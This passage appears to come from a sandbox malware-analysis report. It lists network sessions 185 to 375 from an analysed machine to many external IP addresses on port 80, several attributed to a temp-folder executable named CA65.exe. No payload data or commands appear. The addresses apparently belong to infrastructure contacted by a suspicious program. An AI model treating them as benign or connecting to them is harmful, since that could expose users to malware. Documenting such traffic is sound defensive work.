185	192.168.2.4	59598	192.124.249.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
186	192.168.2.4	59603	205.178.132.70	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
187	192.168.2.4	59592	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
188	192.168.2.4	59637	199.59.243.225	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
189	192.168.2.4	59595	209.182.195.165	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
190	192.168.2.4	59593	38.181.56.100	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
191	192.168.2.4	59665	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
192	192.168.2.4	59671	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
193	192.168.2.4	59698	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
194	192.168.2.4	59675	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
195	192.168.2.4	59673	192.252.151.25	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
196	192.168.2.4	59683	209.124.80.122	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
197	192.168.2.4	59726	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
198	192.168.2.4	59745	13.248.169.48	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
199	192.168.2.4	59739	185.230.63.171	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
200	192.168.2.4	59743	64.68.191.221	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
201	192.168.2.4	59602	68.178.145.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
202	192.168.2.4	59786	206.188.192.247	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
203	192.168.2.4	59760	23.229.226.96	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
204	192.168.2.4	59785	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
205	192.168.2.4	59788	107.158.136.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
206	192.168.2.4	59787	38.181.56.100	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
207	192.168.2.4	59699	183.111.174.109	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
208	192.168.2.4	59681	116.90.51.60	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
209	192.168.2.4	59706	103.42.111.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
210	192.168.2.4	59828	185.230.63.107	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.4	59848	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
212	192.168.2.4	59933	192.185.183.254	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
213	192.168.2.4	59851	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
214	192.168.2.4	59932	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
215	192.168.2.4	59917	209.182.195.165	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
216	192.168.2.4	59920	216.194.166.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
217	192.168.2.4	59934	66.254.66.55	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
218	192.168.2.4	60117	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
219	192.168.2.4	60116	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
220	192.168.2.4	60120	172.98.192.36	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
221	192.168.2.4	60103	104.143.9.211	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.4	60118	208.91.197.26	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.4	60099	185.162.89.66	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.4	60109	34.136.28.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.4	60119	173.201.182.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
226	192.168.2.4	60215	104.17.71.73	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
227	192.168.2.4	60224	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
228	192.168.2.4	60228	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
229	192.168.2.4	60246	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
230	192.168.2.4	60213	66.254.66.55	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
231	192.168.2.4	60220	167.235.0.29	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.4	60124	156.38.230.76	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
233	192.168.2.4	60502	34.136.28.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
234	192.168.2.4	60541	3.94.41.167	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
235	192.168.2.4	60560	104.143.9.211	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
236	192.168.2.4	60581	54.161.222.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
237	192.168.2.4	60568	69.42.204.12	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
238	192.168.2.4	60584	52.165.155.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
239	192.168.2.4	60567	185.162.89.66	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
240	192.168.2.4	60604	34.205.242.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
241	192.168.2.4	60669	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
242	192.168.2.4	60601	23.229.226.96	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.4	60647	107.158.136.76	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
244	192.168.2.4	60691	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
245	192.168.2.4	60699	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.4	60695	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
247	192.168.2.4	60640	91.132.253.137	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
248	192.168.2.4	60639	62.149.128.163	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
249	192.168.2.4	60724	192.185.183.254	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
250	192.168.2.4	60772	141.193.213.10	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.4	60756	173.201.182.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.4	60806	192.124.249.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
253	192.168.2.4	60791	208.91.197.26	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.4	60819	192.124.249.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.4	60792	89.46.108.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.4	60839	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.4	60840	206.188.192.247	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.4	60820	213.186.33.19	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.4	60876	199.59.243.225	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.4	60878	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.4	60773	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.4	60867	185.230.63.171	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.4	60873	35.168.67.138	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.4	60872	192.252.151.25	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.4	60903	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.4	60913	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.4	60923	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.4	60992	141.193.213.10	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.4	60993	104.26.0.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.4	60915	192.252.151.25	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.4	60954	206.188.192.247	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.4	60896	209.182.195.165	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.4	61006	104.26.0.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.4	60930	52.165.155.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.4	61007	192.185.183.254	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.4	61020	104.24.82.4	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.4	61005	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.4	60998	107.158.136.76	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.4	60931	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.4	61002	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.4	61001	38.181.56.100	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.4	61018	209.182.195.165	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.4	61021	66.254.66.55	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
284	192.168.2.4	61022	23.229.226.96	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.4	60950	62.149.128.163	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.4	61008	217.146.69.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
287	192.168.2.4	60997	183.111.174.109	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.4	60986	35.197.165.27	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.4	61017	103.42.111.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.4	61230	35.168.67.138	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
291	192.168.2.4	61042	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
292	192.168.2.4	61246	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
293	192.168.2.4	61112	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
294	192.168.2.4	61455	172.98.192.36	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
295	192.168.2.4	61508	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
296	192.168.2.4	61550	66.254.66.55	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
297	192.168.2.4	61521	173.201.182.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
298	192.168.2.4	61563	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
299	192.168.2.4	61738	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
300	192.168.2.4	61815	185.162.89.66	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
301	192.168.2.4	61856	104.21.52.80	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
302	192.168.2.4	61848	167.235.0.29	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
303	192.168.2.4	61898	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
304	192.168.2.4	61801	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.4	61971	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.4	61969	208.91.197.26	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.4	61991	104.17.71.73	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.4	61954	23.229.226.96	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.4	62038	192.124.249.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.4	62040	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.4	62057	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.4	62123	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.4	62127	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.4	62128	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.4	62132	206.188.192.247	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.4	62125	192.252.151.25	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
317	192.168.2.4	61992	62.149.128.40	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.4	62131	216.194.166.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
319	192.168.2.4	62160	192.185.183.254	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
320	192.168.2.4	62107	213.186.33.19	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
321	192.168.2.4	61946	156.38.230.76	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
322	192.168.2.4	62399	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
323	192.168.2.4	62386	107.158.136.76	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
324	192.168.2.4	62388	38.181.56.100	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
325	192.168.2.4	62400	209.182.195.165	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
326	192.168.2.4	62401	66.254.66.55	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
327	192.168.2.4	62389	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
328	192.168.2.4	62405	62.149.128.40	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
329	192.168.2.4	62461	69.42.204.12	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
330	192.168.2.4	62583	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
331	192.168.2.4	62584	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
332	192.168.2.4	62404	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
333	192.168.2.4	62585	192.178.50.46	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
334	192.168.2.4	62605	34.206.39.153	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
335	192.168.2.4	62654	69.42.204.12	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
336	192.168.2.4	62734	185.230.63.171	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
337	192.168.2.4	62612	183.111.174.109	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
338	192.168.2.4	62829	104.24.82.4	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
339	192.168.2.4	62819	172.98.192.36	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
340	192.168.2.4	62814	208.91.197.26	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
341	192.168.2.4	62797	23.229.226.96	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
342	192.168.2.4	62852	104.21.52.80	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
343	192.168.2.4	62813	216.194.166.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
344	192.168.2.4	62795	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
345	192.168.2.4	62810	103.42.111.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
346	192.168.2.4	62943	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
347	192.168.2.4	62946	205.178.189.129	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
348	192.168.2.4	62955	50.31.65.5	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
349	192.168.2.4	62944	34.136.28.237	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
350	192.168.2.4	62950	209.124.80.122	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
351	192.168.2.4	62963	50.31.65.5	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
352	192.168.2.4	62961	209.124.80.122	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
353	192.168.2.4	62947	173.201.182.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
354	192.168.2.4	63058	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
355	192.168.2.4	62966	91.132.253.137	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
356	192.168.2.4	63013	3.126.94.219	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
357	192.168.2.4	62936	68.178.145.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
358	192.168.2.4	63193	104.143.9.211	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
359	192.168.2.4	63201	38.177.197.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
360	192.168.2.4	63261	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
361	192.168.2.4	63306	192.124.249.58	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
362	192.168.2.4	63256	34.205.242.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
363	192.168.2.4	63285	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
364	192.168.2.4	63281	54.161.222.85	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
365	192.168.2.4	63166	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
366	192.168.2.4	63425	205.178.132.70	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
367	192.168.2.4	63456	104.21.69.169	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
368	192.168.2.4	63486	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
369	192.168.2.4	63535	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
370	192.168.2.4	63542	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
371	192.168.2.4	63536	192.185.183.254	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
372	192.168.2.4	63533	206.188.192.247	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
373	192.168.2.4	63527	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
374	192.168.2.4	63541	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
375	192.168.2.4	63539	35.168.67.138	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
